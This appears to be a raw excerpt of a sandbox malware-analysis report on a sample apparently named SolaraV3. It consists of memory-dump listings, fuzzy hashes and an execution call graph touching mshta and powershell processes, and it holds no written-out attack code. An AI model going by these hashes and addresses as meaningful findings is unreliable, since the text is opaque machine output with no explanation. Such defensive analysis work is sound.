                                                                                                                                                                                                                              • Instruction ID: fca32d4fc1d07bf31e6e7bdcf89ad0092b723f110e0302e0b22b8897c24ce625
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F049B1F1A60282EB149B38D805BAD7395FF50705F948434DA0E967F1EE3CB655DA40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                                                                              • API String ID: 1021210092-540685895
                                                                                                                                                                                                                              • Opcode ID: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
                                                                                                                                                                                                                              • Instruction ID: ae5a6e312222cf1163b0796a455ca3c0b640f8dccf7744732245fad2752b38f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E09AE4B19203C7F3206B70D816F7A2314EF14306F408934EA0FC66B0EE3DB6488A20
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000003.1628231054.000001E8E4120000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001E8E4120000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_3_1e8e4120000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction ID: 9d16b409c9ec77d69d51ecf17be64236ccc05e7719b1bb189ec41b2aadbb4695
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E9002144D544656D91411954C4529C54407388250FD48584492ED0544E84D02962156
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b2d6ade787ed357e6497a69de8cdf48d962bf20568a89c6b9dae304224742da2
                                                                                                                                                                                                                              • Instruction ID: 84ec26f5eaa6ac2b6e51f5690b4679584a63626ddbf508c93b4602d8f5247a4f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2d6ade787ed357e6497a69de8cdf48d962bf20568a89c6b9dae304224742da2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91C15E7290FA8A8FEB95DB28D8566B57BD6EF9A310F1841BED04DC71C3D914980DC382
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: abffac753f7c6b03a740501f83d72e8cfa5adf43ea15cd90bc4ae65dc1844149
                                                                                                                                                                                                                              • Instruction ID: 984ad9717db845eb0a741ada6e68ed329c1d47497792a6ab78e02b86c95ca345
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abffac753f7c6b03a740501f83d72e8cfa5adf43ea15cd90bc4ae65dc1844149
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6021AAA2C0EAC98FE7458F581C551A97F90FF6A304B5480BBE58CC62D7E9149A0DC3C1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 34ecbc1695cbafc88a9ff785886c0a4bbbff67117dc511f868d33b613995a168
                                                                                                                                                                                                                              • Instruction ID: 9852ff4471a4c0981996665c0e7930f4e6d0aabac0a35faba5b55a54c84883cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34ecbc1695cbafc88a9ff785886c0a4bbbff67117dc511f868d33b613995a168
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84215EA284E7C64FE702AB78D8255D57FB09F13215B0981F7D48DCA0A3EA189D58C7A2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: fa8896f8774f9bb3cd2eabd7eca81a21d5d0049de57dbb421b1c949369e40c0b
                                                                                                                                                                                                                              • Instruction ID: 565b14306a03913e7d31346f53b5c7a096c385fdf3134273aad4f5ba78ff2e82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa8896f8774f9bb3cd2eabd7eca81a21d5d0049de57dbb421b1c949369e40c0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C841177191CB8C8FDB199B5CAC466E97BE0EF56321F04426FE48DD3193DA20A855CBC2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1799591334.00007FFAA935D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA935D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa935d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e267de694184f7042224271672bfb3ffd0ffd6950c5328a273208ac91d4bce88
                                                                                                                                                                                                                              • Instruction ID: 07792f63c61870ca840826411f5b383191accbe031543de29bd95c2e36effa75
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e267de694184f7042224271672bfb3ffd0ffd6950c5328a273208ac91d4bce88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3741277180DBC49FE7568B299845A523FF0EF5B360F1505DFD088CB1A3D629A84AC7E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f6bcd09c1de63c8569c6f6e2340521d134de2ca7011bd335571ef8e17f1f0695
                                                                                                                                                                                                                              • Instruction ID: ab6f21d630bb0a8c83626b80cf3df1f75b9d42aae60c0569a1af17c6cfe08799
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6bcd09c1de63c8569c6f6e2340521d134de2ca7011bd335571ef8e17f1f0695
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221C57190CA4C8FDB58DF9CD84A7E97BE0EB99321F00816FD44DC3152D674945ACB91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                              • Instruction ID: 88cc23d79eb794b7af4e79960fe3fc061deb100e6f1e98f29b6d8e6c8227903f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C501A77010CB0C8FD744EF0CE051AA5B3E0FB89320F10052DE58AC36A1DA32E882CB45
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 80e68014cc9b91165b47c17ebb391c07413e4b91b143e9cc4f1d171c15582066
                                                                                                                                                                                                                              • Instruction ID: 5af8d83662ffaeaff1100a0c84d4706e75cc014a303c9f4b3df90d62fc585d92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80e68014cc9b91165b47c17ebb391c07413e4b91b143e9cc4f1d171c15582066
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29F0B432A4D606CFD7A8EF1CE4418A877E1FF8932071100B6E14EC7063CA25EC89CB85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: df65c8ed74ed8769cc0551f7294d202d5928e1895130d2c2169bbe5d84b883a0
                                                                                                                                                                                                                              • Instruction ID: d69606373d9e3719fe7ea0a3b963d359d9550eec97c98c083d2abeff78c4b452
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df65c8ed74ed8769cc0551f7294d202d5928e1895130d2c2169bbe5d84b883a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF05E32A4D545CFDB94EF5CE4428A877E4EF4932071540B6E14ECB4A3CA25EC49C784
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6c6bc8c6caa1746d8e89a5865c072bdb6f496e93d066a868aefa254ba884f967
                                                                                                                                                                                                                              • Instruction ID: 9763b42cdd2d6013b6f3d17cd30bf9131b8e04178d1940d39c0b12426d0bb573
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c6bc8c6caa1746d8e89a5865c072bdb6f496e93d066a868aefa254ba884f967
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AE0CD3024D7864FD345962CD040BB9BA819F8A310F94587DF4DDC73C3C55D54419392
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                                                                                                                                              • API String ID: 0-3508309026
                                                                                                                                                                                                                              • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                                              • Instruction ID: 1cd2c07a3268aa8ebcd90590385cf68d3d52b2af61b588c0c0cf42b5b0a1b759
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 492138F7A080254ED3017BFDFC259D93B80DF9523574902B2D29CCF143E914B19A8ACA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @n}
                                                                                                                                                                                                                              • API String ID: 0-2187169710
                                                                                                                                                                                                                              • Opcode ID: 396ae0b3a4289378dd5899685ec062c7162ec420501fd3ab524516c4320c0618
                                                                                                                                                                                                                              • Instruction ID: 95327f7525dcf8627226dc2ddf02c9e178c4f10009ee890190a050323a65e39c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396ae0b3a4289378dd5899685ec062c7162ec420501fd3ab524516c4320c0618
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87614932E0DB8A4FE7559B2C98965B53BE5DF8A220B1845BFD04DC7193EE14AD0EC381
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ece3ce9482bf21ce800060e8d616f9c89da71c064b25a684040973d1d074049c
                                                                                                                                                                                                                              • Instruction ID: f7a03e3a7529bdbf67f0f756a3632abfecd150a10706c05d1e5d10490311fd00
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ece3ce9482bf21ce800060e8d616f9c89da71c064b25a684040973d1d074049c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82813831D0E68A8FD7569B6898A65B57FE5EF4B210B0945FFC04DC7093E918A90EC3C2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.1913208170.00007FFAA94A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA94A0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffaa94a0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 140e59516adf71d7cd3e886773f66b0c55fa0c1453ba5ef8b0e22e777fae9f5c
                                                                                                                                                                                                                              • Instruction ID: e5aef8e67a8fddadece1e6a8778f2eb0db4bed9e338884ebe5ead9ab12ddd2e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 140e59516adf71d7cd3e886773f66b0c55fa0c1453ba5ef8b0e22e777fae9f5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD618070E09A498FDB48DF6CC8556ADBBF1EF5A310F14817ED00ED7292CA35A846CB81
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2e7936bb2b62bfaa7cbc381e12f9ea5e401ee7bfc5551ad9b74f2241c80561ec
                                                                                                                                                                                                                              • Instruction ID: 63a71af613fe51779dd32ff158bf3f08c8ecdd4830a677b90a814246bb87bf0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e7936bb2b62bfaa7cbc381e12f9ea5e401ee7bfc5551ad9b74f2241c80561ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9410421D0EA878FE3669B6844A61B57BA5EF4B201B4D84FFC08DC7093F918A90D8381
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.1913208170.00007FFAA94A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA94A0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffaa94a0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                              • Instruction ID: 479efd16ea84b236b65a2c3c78bc079abb2a626731f19f5cd14335574debdeea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F001677111CB0C8FD744EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E881CB45

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                              Total number of Nodes:1219
                                                                                                                                                                                                                              Total number of Limit Nodes:37
                                                                                                                                                                                                                              execution_graph 38255 7ff74eed9c74 38256 7ff74eed9c7c 38255->38256 38257 7ff74eed9cbb 38256->38257 38258 7ff74eed9cac 38256->38258 38261 7ff74eed9cc5 38257->38261 38277 7ff74eedce08 32 API calls 2 library calls 38257->38277 38276 7ff74eed4f3c 15 API calls _set_errno_from_matherr 38258->38276 38264 7ff74eed4b8c 38261->38264 38263 7ff74eed9cb1 __scrt_fastfail 38265 7ff74eed4ba1 38264->38265 38266 7ff74eed4bab 38264->38266 38278 7ff74eed4ab4 38265->38278 38268 7ff74eed4bb0 38266->38268 38274 7ff74eed4bb7 __vcrt_getptd_noexit 38266->38274 38285 7ff74eed4a74 38268->38285 38270 7ff74eed4bf6 38294 7ff74eed4f3c 15 API calls _set_errno_from_matherr 38270->38294 38271 7ff74eed4ba9 38271->38263 38272 7ff74eed4be0 RtlReAllocateHeap 38272->38271 38272->38274 38274->38270 38274->38272 38291 7ff74eed36c0 38274->38291 38276->38263 38277->38261 38279 7ff74eed4aff 38278->38279 38283 7ff74eed4ac3 __vcrt_getptd_noexit 38278->38283 38295 7ff74eed4f3c 15 API calls _set_errno_from_matherr 38279->38295 38280 7ff74eed4ae6 RtlAllocateHeap 38282 7ff74eed4afd 38280->38282 38280->38283 38282->38271 38283->38279 38283->38280 38284 7ff74eed36c0 new 2 API calls 38283->38284 38284->38283 38286 7ff74eed4a79 RtlFreeHeap 38285->38286 38290 7ff74eed4aa9 __free_lconv_mon 38285->38290 38287 7ff74eed4a94 38286->38287 38286->38290 38296 7ff74eed4f3c 15 API calls _set_errno_from_matherr 38287->38296 38289 7ff74eed4a99 GetLastError 38289->38290 38290->38271 38297 7ff74eed3700 38291->38297 38294->38271 38295->38282 38296->38289 38302 7ff74eed6938 EnterCriticalSection 38297->38302 38299 7ff74eed370d 38300 7ff74eed6998 fflush LeaveCriticalSection 38299->38300 38301 7ff74eed36d2 38300->38301 38301->38274 38303 7ff74eebbb70 38306 7ff74eebbb80 38303->38306 38315 7ff74eebbae8 38306->38315 38308 7ff74eebbb79 38309 7ff74eebbb97 38309->38308 38320 7ff74ee81690 38309->38320 38311 7ff74eebbbd5 LeaveCriticalSection 38313 7ff74eebbae8 67 API calls 38311->38313 38312 7ff74eebbbc8 SetEvent 38312->38311 38313->38309 38324 7ff74eebb974 WaitForSingleObject 38315->38324 38318 7ff74eebbb12 38318->38309 38319 7ff74eebbb16 EnterCriticalSection LeaveCriticalSection 38319->38318 38321 7ff74ee816a4 38320->38321 38322 7ff74ee816c2 EnterCriticalSection 38320->38322 38321->38322 38332 7ff74ee81180 38321->38332 38322->38311 38322->38312 38325 7ff74eebb986 GetLastError 38324->38325 38326 7ff74eebb9b7 38324->38326 38330 7ff74ee8ca6c 48 API calls 2 library calls 38325->38330 38326->38318 38326->38319 38328 7ff74eebb9a6 38331 7ff74ee8ca40 61 API calls _CxxThrowException 38328->38331 38330->38328 38331->38326 38333 7ff74ee811ab 38332->38333 38340 7ff74ee811b0 38332->38340 38342 7ff74ee817c8 216 API calls 2 library calls 38333->38342 38335 7ff74ee8166a 38335->38321 38336 7ff74eea6fe8 216 API calls 38336->38340 38337 7ff74eea6d38 216 API calls 38337->38340 38338 7ff74ee81080 48 API calls 38338->38340 38340->38335 38340->38336 38340->38337 38340->38338 38341 7ff74eea6e90 216 API calls 38340->38341 38343 7ff74ee817c8 216 API calls 2 library calls 38340->38343 38341->38340 38342->38340 38343->38340 38344 7ff74ee77a5b 38345 7ff74ee77a60 38344->38345 38347 7ff74ee77af7 38345->38347 38377 7ff74ee89be0 38345->38377 38348 7ff74ee77bda 38347->38348 38480 7ff74ee91e1c GetFileTime 38347->38480 38388 7ff74ee7b540 38348->38388 38353 7ff74ee7b540 147 API calls 38356 7ff74ee77c9c 38353->38356 38354 7ff74ee77c3e 38354->38353 38355 7ff74ee77f89 38356->38355 38482 7ff74ee96378 38356->38482 38358 7ff74ee77cd7 38359 7ff74ee96378 4 API calls 38358->38359 38361 7ff74ee77cf3 38359->38361 38360 7ff74ee77de1 38367 7ff74ee77e4e 38360->38367 38493 7ff74eea98dc 38360->38493 38361->38360 38363 7ff74ee77d59 38361->38363 38364 7ff74ee77d38 38361->38364 38366 7ff74eeca444 new 4 API calls 38363->38366 38486 7ff74eeca444 38364->38486 38372 7ff74ee77d42 std::bad_alloc::bad_alloc 38366->38372 38499 7ff74ee71204 48 API calls 38367->38499 38369 7ff74ee77eb3 38371 7ff74ee77edb 38369->38371 38500 7ff74eea9680 38369->38500 38506 7ff74ee96424 8 API calls _handle_error 38371->38506 38372->38360 38492 7ff74eecba34 RtlPcToFileHeader RaiseException 38372->38492 38375 7ff74ee77f56 38376 7ff74ee7b540 147 API calls 38375->38376 38376->38355 38507 7ff74ee8901c CryptAcquireContextW 38377->38507 38381 7ff74ee89c2a 38517 7ff74eeb9ce4 38381->38517 38385 7ff74ee89c5b memcpy_s 38527 7ff74eeca610 38385->38527 38392 7ff74ee7b55f pre_c_initialization 38388->38392 38389 7ff74ee7b5a1 38390 7ff74ee7b5d8 38389->38390 38391 7ff74ee7b5b8 38389->38391 38666 7ff74eea8c1c 38390->38666 38552 7ff74ee7aba0 38391->38552 38392->38389 38548 7ff74ee7a4d0 38392->38548 38394 7ff74ee7b5d3 38396 7ff74eeca610 _handle_error 8 API calls 38394->38396 38398 7ff74ee77bf8 38396->38398 38397 7ff74ee7b67f 38399 7ff74ee7bc91 38397->38399 38400 7ff74ee7bbae 38397->38400 38401 7ff74ee7b6a5 38397->38401 38398->38354 38481 7ff74eec9b98 216 API calls 3 library calls 38398->38481 38399->38394 38404 7ff74ee92574 126 API calls 38399->38404 38402 7ff74eea8d00 48 API calls 38400->38402 38401->38394 38411 7ff74ee7b6b5 38401->38411 38415 7ff74ee7b79f 38401->38415 38405 7ff74ee7bc5c 38402->38405 38404->38394 38735 7ff74eea8d38 48 API calls 38405->38735 38409 7ff74ee7bc69 38736 7ff74eea8d38 48 API calls 38409->38736 38411->38394 38700 7ff74eea8d00 38411->38700 38413 7ff74ee7bc76 38737 7ff74eea8d38 48 API calls 38413->38737 38431 7ff74ee7b8e5 38415->38431 38717 7ff74ee7c3c8 CharLowerW CharUpperW 38415->38717 38416 7ff74ee7bc84 38738 7ff74eea8d88 48 API calls 38416->38738 38421 7ff74ee7b726 38704 7ff74eea8d38 48 API calls 38421->38704 38423 7ff74ee7b733 38424 7ff74ee7b749 38423->38424 38705 7ff74eea8d88 48 API calls 38423->38705 38426 7ff74ee7b75c 38424->38426 38706 7ff74eea8d38 48 API calls 38424->38706 